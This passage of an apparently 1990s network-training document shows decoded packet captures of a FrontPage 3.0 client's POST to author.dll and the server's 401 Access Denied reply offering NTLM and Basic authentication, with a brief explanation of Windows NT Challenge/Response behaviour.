TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize TCP: .......0 = No Fin
TCP: Window = 8760 (0x2238) TCP: Checksum = 0xA8FF
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 379 (0x017B)
HTTP: POST Request (from client using port 1140) HTTP: Request Method = POST
HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll
HTTP: Protocol Version = HTTP/1.0
HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT HTTP: MIME-Version = 1.0
HTTP: User-Agent = MSFrontPage/3.0 HTTP: Host = 204.73.131.19
HTTP: Accept = auth/sicily HTTP: Content-Length = 62
HTTP: Content-Encoding = x-vermeer-1
HTTP: Content-Type = application/x-vermeer-rpc
HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc
HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type
HTTP: Undocumented Header Value = application/x-vermeer-rpc
HTTP: Data: Number of data bytes remaining = 62 (0x003E)
00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00 ..O.....O.....E.
00010: 01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49 ....@......I...I
00020: 83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18 ...t.P.....>..P.
00030: 22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69 "8....POST /_vti
00040: 5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75 _bin/_vti_aut/au
00050: 74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E thor.dll HTTP/1.
00060: 30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31 0..Date: Mon, 01
00070: 20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A Dec 1997 23:57:
00080: 31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72 10 GMT..MIME-Ver
00090: 73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D sion: 1.0..User-
000A0: 41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61 Agent: MSFrontPa
000B0: 67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30 ge/3.0..Host: 20
000C0: 34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63 4.73.131.19..Acc
000D0: 65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79 ept: auth/sicily
000E0: 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 ..Content-Length
000F0: 3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E : 62..Content-En
00100: 63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65 coding: x-vermee
00110: 72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 r-1..Content-Typ
00120: 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 e: application/x
00130: 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D -vermeer-rpc..X-
00140: 56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D Vermeer-Content-
00150: 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F Type: applicatio
00160: 6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D n/x-vermeer-rpc.
00170: 0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39 ....2}.........9
00180: 84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79 .......9...#..Ay
00190: 05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3 ..Ex..AP..G..U}.
001A0: F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28 ......#.......y(
001B0: B1 .
If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session,
is responded to with an accesss denied HTTP frame:
23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.392
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 23 FRAME: Total frame length: 224 bytes
FRAME: Capture frame length: 224 bytes
FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C8F
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 224 (0x00E0)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2)
IP: ID = 0xC126; Proto = TCP; Len: 210 IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0)
IP: Precedence = Routine IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability IP: Total Length = 210 (0xD2)
IP: Identification = 49446 (0xC126) IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control IP: Checksum = 0x9A46
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.18
IP: Data: Number of data bytes remaining = 190 (0x00BE)
TCP: .AP..., len: 170, seq: 4115388-4115557, ack: 705904, win: 8381, src: 80 dst: 1140
TCP: Source Port = Hypertext Transfer Protocol
TCP: Destination Port = 0x0474 TCP: Sequence Number = 4115388 (0x3ECBBC)
TCP: Acknowledgement Number = 705904 (0xAC570)
TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize TCP: .......0 = No Fin
TCP: Window = 8381 (0x20BD) TCP: Checksum = 0xD958
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 170 (0x00AA)
HTTP: Response (to client using port 1140) HTTP: Protocol Version = HTTP/1.0
HTTP: Status Code = Unauthorized HTTP: Reason = Access Denied
HTTP: WWW-Authenticate = NTLM
HTTP: WWW-Authenticate = Basic realm="204.73.131.19"
HTTP: Content-Length = 24 HTTP: Content-Type = text/html
HTTP: Data: Number of data bytes remaining = 24 (0x0018)
00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I
00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP.
00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34 ..X..HTTP/1.0 4
00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied
00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica
00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au
00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi
00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73.
00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"..Content
000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con
000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/
000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A
000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.